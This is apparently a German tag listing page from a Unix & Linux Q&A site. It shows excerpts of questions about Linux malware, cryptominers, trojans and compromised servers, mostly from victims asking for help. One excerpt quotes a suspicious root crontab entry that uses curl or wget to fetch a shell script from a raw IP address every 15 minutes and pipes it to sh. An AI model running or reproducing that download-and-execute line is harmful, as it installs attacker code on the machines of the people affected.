Unix & Linux malware

9

Kann sich meine Linux-Box mit Malware infizieren? Ich habe noch nie von jemandem gehört, den ich kenne, und ich habe einige Male gehört, dass dies nicht möglich ist. Ist das wahr? Wenn ja, was ist mit der Linux-Anti-Virus-Software (Sicherheitssoftware) los?

142 security malware

2

Verdächtiger Crontab-Eintrag, der alle 15 Minuten 'xribfa4' ausführt

Ich wollte etwas zu meiner Root-Crontab-Datei auf meinem Raspberry Pi hinzufügen und habe einen Eintrag gefunden, der mir verdächtig erscheint. Bei der Suche nach Teilen davon bei Google ist nichts aufgetaucht. Crontab-Eintrag: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh Die Inhalte von …

59 security cron malware

8

Kann Malware, die von einem Benutzer ohne Administrator- oder Sudo-Berechtigungen ausgeführt wird, meinem System schaden? [geschlossen]

Nach einem kürzlichen Einbruch auf einem Linux-Computer habe ich eine ausführbare Datei im Home-Ordner eines Benutzers mit einem schwachen Passwort gefunden. Ich habe alles aufgeräumt, was den Schaden zu bedeuten scheint, bereite aber zur Sicherheit ein vollständiges Abwischen vor. Was kann Malware, die von einem Nicht-Sudo-Benutzer oder einem nicht privilegierten …

30 security malware

2

Wie kann ich Minerd-Malware auf einer AWS EC2-Instanz entfernen? (kompromittierter Server)

Ich habe auf meiner ec2-Instanz Malware gefunden, die kontinuierlich Bitcoin abbaut und die Rechenleistung meiner Instanz nutzt. Ich habe den Prozess erfolgreich identifiziert, konnte ihn jedoch nicht entfernen und beenden. Ich habe diesen Befehl ausgeführt. watch "ps aux | sort -nrk 3,3 | head -n 5" Er zeigt die fünf …

26 linux process kill malware

5

Wird Ihre Linux-Plattform durch die Installation und Verwendung von Wine für Windows-Viren geöffnet?

Ich frage mich nur, ob die Installation von Wine einen ziemlich soliden Linux-Desktop für die Welt der Windows-Viren öffnen könnte. Bestätigte Berichte darüber? Würden Sie dann ein Windows-Virenschutzprodukt unter Wine installieren?

23 security emulation windows malware

4

Wie erkenne und entferne ich einen Linux-Trojaner?

Ich bin kürzlich (wieder) darauf gestoßen: Linux-Trojaner bleibt fast ein Jahr lang unbemerkt (Unreal IRCd) Ja, ich weiß, dass das Hinzufügen einer zufälligen PPA / Software von einer nicht vertrauenswürdigen Quelle zu Problemen (oder Schlimmerem) führt. Ich mache das nie, aber viele machen es (viele Linux-Blogs und -Tabloids fördern das …

16 security malware

1

Wie kann man feststellen, ob mysteriöse Programme in der Liste der Nethogs Malware sind?

Das sehe ich in Nethogs: Ich bin besorgt über die Auflistungen mit PID ?, ausgeführt als root. Wie kann ich herausfinden, was das ist? Ich verwende Linux Mint 14. Bitte lassen Sie mich wissen, welche weiteren Informationen ich hinzufügen soll.

12 networking malware

2

Wie funktioniert fileless Malware unter Linux?

Ich verstehe die Definition von fileless Malware: Schädlicher Code, der nicht dateibasiert ist, sondern nur im Speicher vorhanden ist… Insbesondere fileless bösartiger Code… hängt sich an einen aktiven Prozess im Speicher an… Kann jemand bitte erklären, wie das Anhängen an einen aktiven Prozess im Speicher funktioniert? Welcher (Kernel-) Schutz / …

10 process linux-kernel malware

2

rmdir konnte das leere Verzeichnis nicht entfernen

Ich habe ein Problem beim Entfernen des leeren Verzeichnisses. Strace zeigt einen Fehler an: rmdir("empty_dir") = -1 ENOTEMPTY (Directory not empty) Und ls -la empty_dirzeigt nichts. Also habe ich mich mit debugfs mit dem fs (ext4) verbunden und sehe die versteckte Datei in diesem Verzeichnis: # ls -lia empty_dir/ total …

7 ext4 malware debugfs

2

Kann ich mich in diesem Fall infizieren, wenn ich eine Live-CD betreibe?

Ich habe kürzlich einen fiesen Trojaner unter Windows losgeworden und möchte auf Linux (Ubuntu) migrieren. Ich möchte eine Live-CD ausführen, damit ich eine SD-Karte formatieren kann, um meine brandneue Firmware auf meinem Router zu installieren, und die Festplatte formatieren kann, damit ich Ubuntu installieren kann. Ist es in diesem Fall …

7 ubuntu security malware

3

Soll ich ein Antivirenprogramm installieren? [geschlossen]

Geschlossen . Diese Frage basiert auf Meinungen . Derzeit werden keine Antworten akzeptiert. Möchten Sie diese Frage verbessern? Aktualisieren Sie die Frage, damit sie durch Bearbeiten dieses Beitrags mit Fakten und Zitaten beantwortet werden kann . Geschlossen vor 3 Jahren . Sind integrierte Sicherheitsfunktionen zur Sicherung des Benutzerverhaltens ausreichend, um …

7 malware

1

Der ursprüngliche oberste ausführbare Befehl kann nicht über einen böswilligen Befehl kopiert werden

Jemand hat mein System gehackt und einige der Systembefehle wie top, ps, find usw. durch böswillige ersetzt. Jetzt versuche ich, die ursprünglichen zu kopieren, aber die Kopier- oder Verschiebebefehle schlagen fehl, obwohl ich als Root angemeldet bin. Ich erhalte folgenden Fehler: cp /root/top /usr/bin/ cp: overwrite `/usr/bin/top', overriding mode 0755? …

permissions malware

Als «malware» getaggte Fragen